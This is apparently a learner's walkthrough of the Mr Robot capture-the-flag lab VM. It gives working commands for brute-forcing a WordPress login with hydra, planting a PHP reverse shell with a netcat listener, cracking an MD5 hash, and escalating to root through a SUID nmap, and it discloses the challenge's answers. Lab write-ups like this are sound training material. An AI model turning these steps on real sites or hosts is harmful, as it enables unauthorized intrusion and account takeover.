Mr Robot CTF¶
This is the first CTF I successfully went through. I followed exactly the steps Alexi
Here, let me go through it quickly and do some brief explanations.
Preparation Work¶
Target system Mr Robot running.
kali linux with toolboxs running
Both the two systems runs on Virtual Box and can access each other
Attack¶
Get The IP Address of The Target Machine¶
The methods we can use are: nmap, netdiscover or via router configuration :) .
nmap -F <ip ranges> # -F stands for "fast check"
netdiscover -r <ip ranges> [-i interface]
For example:
nmap -F 192.168.1.0/24
netdiscover -r 192.168.1.0/24 -i eth0
In my setup, the ip address of the target machine is `192.168.31.224`.
Gather Information¶
Use the browser to access the ip address, enjoy the fancy interface!
However, we need to use some scanners to collect more detailed and useful information. Here we use nikto
nikto -h 192.168.31.224 # specify the host address
The interesting things are:
The
`robot.txt`fileThe website is running based on wordpress. The administrator login address is
`/wp_login.php`
Key 1¶
The information about key 1 lies in the `robot.txt`. Download the two files `fsocity.dic` and `key-1-of-3.txt`.
The file from `192.168.31.224/key-1-of-3.txt` has the key.
The file from `192.168.31.224/fsocity.dic` is a dictionary.
Key 2¶
Log In¶
In the Gather Information, we found the login address of the website. And we have a dictionary, our next step is to find the username and password.
Good thing about the WordPress is that if the username doesn’t exist, the system tells you Invalid username. If the user exists but the password is wrong, it says Your password is wrong. This is good, because we don’t need to brutal force both the username and the password at the same time. We can try username first, then password.
The first tool we are going to use is Burp Suite. Setup the proxy correctly and capture the packet when hitting the Login button, the packet intercepted contains the following pattern log=username&pwd=password&submit=Log+In.
The second tool to crack the username is hydra. Remember the dictionary we just downloaded? We are going to use it to break both the username and the password.
The syntax for hydra is
hydra -V -L [username list file] -P [password list file] <website ip> <http post method> <login address with parameters>
Pointing out that, if you know the username/password, replace the uppercase letter (L or P) with the lowercase letter (l or p).
Now break the username with the original dictionary
hydra -V -L fsocity.dic -p testpwd 192.168.1.108 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In'
The username is `Elliot`. Aha! It’s the hero in the TV Show “Mr. Robot”.
To make the number of trials smaller, we can sort the terms and remove the duplicated terms.
cat fsocity.dic | sort -u | uniq > cleaned.dic
Now break the password.
hydra -V -l Elliot -P cleaned.dic 192.168.1.108 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In'
The password is `ER28-0652`. It is the employee id of Elliot in the show.
Now we can log in and Elliot is the administrator. Perfect! But we still need to go through some more steps.
Get the Shell¶
Our idea is to insert a piece of reverse shell code to one of the webpage and use netcat to listen to the reverse connection.
Search keywords reverse shell php and copy one useable result. I’m going to the result from Reverse Shell Cheat Sheet | pentestmonkey. Remember to replace the IP address with your kali linux’s ip and remember the connection port. The webpage I choose is the 404 webpage and the port is 1234.
Find `Appearance->Editor` from the left toolbar and choose any website you like on the right. Add the reverse shell codes to the webpage source code.
Open two terminals. The first one opens a `netcat` which listens to the reverse connection from the website; the second one access the changed webpage using tool say curl.
netcat -lvp 1234 # listen to port 1234
curl http://192.168.31.224/404.php
Now we have the shell. But we don’t have the tty yet. Try
python -c 'import pty; pty.spawn("/bin/sh")'
In `/home/robot/` we see the key-2-of-3.txt and `password.raw-md5`. We cannot see the content of the key file but we can see the password-md5. Use any online md5 cracker, say CrackStation to break the md5, the corresponding password in plaintext is abcdefghijklmnopqrstuvwxyz.
Change user to `robot`
su robot # enter the password you got
Now you can see the second key.
Key 3¶
User `robot` is not the root user. We need to find a way to have root access. The idea here is to find some commands/tools which has root access and also can work interactively.
The first step is to search commands we can use and also has the root privilege.
find / -perm -4000 2>/dev/null # -4000 refers to suid or say commands with super user id. 2>/dev/null is to redirect all the error message to /dev/null which means don't show any error. 2 stands for error output stream
We find `nmap`! `nmap` has interactive mode, which is good.
Execute
nmap --interactive
and then enter the `root` directory, you can see the third key file key-3-of-3.txt